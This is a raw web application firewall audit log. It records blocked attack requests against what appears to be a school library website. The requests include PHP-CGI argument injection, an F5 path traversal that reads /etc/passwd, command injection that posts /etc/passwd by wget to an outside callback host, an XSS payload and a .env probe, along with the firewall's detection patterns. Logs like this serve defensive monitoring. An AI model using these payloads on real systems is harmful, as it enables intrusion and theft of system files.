166620530 --8cd96923-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8cd96923-E-- --8cd96923-H-- Message: Access denied with 
code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312715132909 2030 (- - -) Stopwatch2: 1748312715132909 2030; combined=961, p1=306, p2=635, p3=0, p4=0, p5=20, sr=50, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd96923-Z-- --a04f8b4e-A-- [27/May/2025:09:26:04 +0700] aDUivBLFq2VRfSzm6b8WxQAAAI4 103.236.140.4 47544 103.236.140.4 8181 --a04f8b4e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168511512 --a04f8b4e-C-- --a04f8b4e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a04f8b4e-E-- --a04f8b4e-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312764113676 4161 (- - -) Stopwatch2: 1748312764113676 4161; combined=2350, p1=472, p2=1843, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a04f8b4e-Z-- --72f60c05-A-- [27/May/2025:09:26:06 +0700] aDUivhLFq2VRfSzm6b8WxgAAAJA 103.236.140.4 47548 103.236.140.4 8181 --72f60c05-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166636395 --72f60c05-C-- --72f60c05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f60c05-E-- --72f60c05-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312766130942 3015 (- - -) Stopwatch2: 1748312766130942 3015; combined=1748, p1=368, p2=1353, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f60c05-Z-- --21a6031a-A-- [27/May/2025:09:26:08 +0700] aDUiwGTuEZUBy5rh0saCSQAAAA8 103.236.140.4 47552 103.236.140.4 8181 --21a6031a-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168511515 --21a6031a-C-- --21a6031a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21a6031a-E-- --21a6031a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312768134873 2937 (- - -) Stopwatch2: 1748312768134873 2937; combined=1780, p1=370, p2=1383, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21a6031a-Z-- --b3837309-A-- [27/May/2025:09:26:10 +0700] aDUiwluSH_Spa4YU2Zmv-QAAANY 103.236.140.4 47556 103.236.140.4 8181 --b3837309-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166636398 --b3837309-C-- --b3837309-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3837309-E-- --b3837309-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312770094366 3328 (- - -) Stopwatch2: 1748312770094366 3328; combined=1848, p1=349, p2=1462, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3837309-Z-- --a896927c-A-- [27/May/2025:09:47:10 +0700] aDUnrhLFq2VRfSzm6b8W0gAAAIw 103.236.140.4 47710 103.236.140.4 8181 --a896927c-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511575 --a896927c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a896927c-E-- --a896927c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314030593308 2326 (- - -) Stopwatch2: 1748314030593308 2326; combined=574, p1=437, p2=106, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a896927c-Z-- --54e3e61b-A-- [27/May/2025:09:47:15 +0700] aDUnsxLFq2VRfSzm6b8W0wAAAIk 103.236.140.4 47710 103.236.140.4 8181 --54e3e61b-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511578 --54e3e61b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --54e3e61b-E-- --54e3e61b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314035409052 2026 (- - -) Stopwatch2: 1748314035409052 2026; combined=624, p1=495, p2=100, p3=0, p4=0, p5=28, sr=140, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54e3e61b-Z-- --5fc0f02d-A-- [27/May/2025:09:58:19 +0700] aDUqS2TuEZUBy5rh0saCtAAAABQ 103.236.140.4 48716 103.236.140.4 8181 --5fc0f02d-B-- GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgmbas4u6frnx6o.oast.live) HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620536 --5fc0f02d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5fc0f02d-E-- --5fc0f02d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgmbas4u6frnx6o.oast.live)"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314699501190 1997 (- - -) Stopwatch2: 1748314699501190 1997; combined=591, p1=363, p2=163, p3=0, p4=0, p5=65, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fc0f02d-Z-- --1e1d2c1b-A-- [27/May/2025:09:58:19 +0700] aDUqS2TuEZUBy5rh0saCswAAAAk 103.236.140.4 48698 103.236.140.4 8181 --1e1d2c1b-B-- GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163550270 --1e1d2c1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e1d2c1b-E-- --1e1d2c1b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\bon(?:abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mouse(?:down|move|out|over|up)|move|readystatechange|reset|resize|select|submit|unload)\\b[^a-zA-Z0-9_]{0,}?=" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "69"] [id "212750"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: onerror= found within REQUEST_URI: /public/error.jsp?errcode=\x22>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314699500688 2647 (- - -) Stopwatch2: 1748314699500688 2647; combined=1394, p1=395, p2=972, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e1d2c1b-Z-- --e1c50b2c-A-- [27/May/2025:09:58:19 +0700] aDUqS1uSH_Spa4YU2ZmwmgAAANM 103.236.140.4 48718 103.236.140.4 8181 --e1c50b2c-B-- GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577510 --e1c50b2c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e1c50b2c-E-- --e1c50b2c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748314699518895 1669 (- - -) Stopwatch2: 1748314699518895 1669; combined=505, p1=370, p2=106, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c50b2c-Z-- --83262a70-A-- [27/May/2025:10:12:06 +0700] aDUthluSH_Spa4YU2ZmwoAAAAMQ 103.236.140.4 48840 103.236.140.4 8181 --83262a70-B-- GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577519 --83262a70-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --83262a70-E-- --83262a70-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748315526097985 1525 (- - -) Stopwatch2: 1748315526097985 1525; combined=444, p1=317, p2=91, p3=0, p4=0, p5=36, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83262a70-Z-- --43b9a463-A-- [27/May/2025:10:12:06 +0700] aDUthluSH_Spa4YU2ZmwoQAAAMM 103.236.140.4 48840 103.236.140.4 8181 --43b9a463-B-- GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgwyowya8y8917d.oast.live) HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511616 --43b9a463-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --43b9a463-E-- --43b9a463-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgwyowya8y8917d.oast.live)"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748315526115946 2027 (- - -) Stopwatch2: 1748315526115946 2027; combined=649, p1=488, p2=122, p3=0, p4=0, p5=38, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b9a463-Z-- --aa38525f-A-- [27/May/2025:10:12:07 +0700] aDUth1uSH_Spa4YU2ZmwowAAAMk 103.236.140.4 48852 103.236.140.4 8181 --aa38525f-B-- GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577525 --aa38525f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa38525f-E-- --aa38525f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\bon(?:abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mouse(?:down|move|out|over|up)|move|readystatechange|reset|resize|select|submit|unload)\\b[^a-zA-Z0-9_]{0,}?=" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "69"] [id "212750"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: onerror= found within REQUEST_URI: /public/error.jsp?errcode=\x22>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748315527095291 2513 (- - -) Stopwatch2: 1748315527095291 2513; combined=1041, p1=399, p2=609, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa38525f-Z-- --d843c51d-A-- [27/May/2025:10:22:20 +0700] aDUv7N6cNBpj1JOkpQlTRAAAAEM 103.236.140.4 48954 103.236.140.4 8181 --d843c51d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.81.24.74 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d843c51d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d843c51d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748316140416432 780 (- - -) Stopwatch2: 1748316140416432 780; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
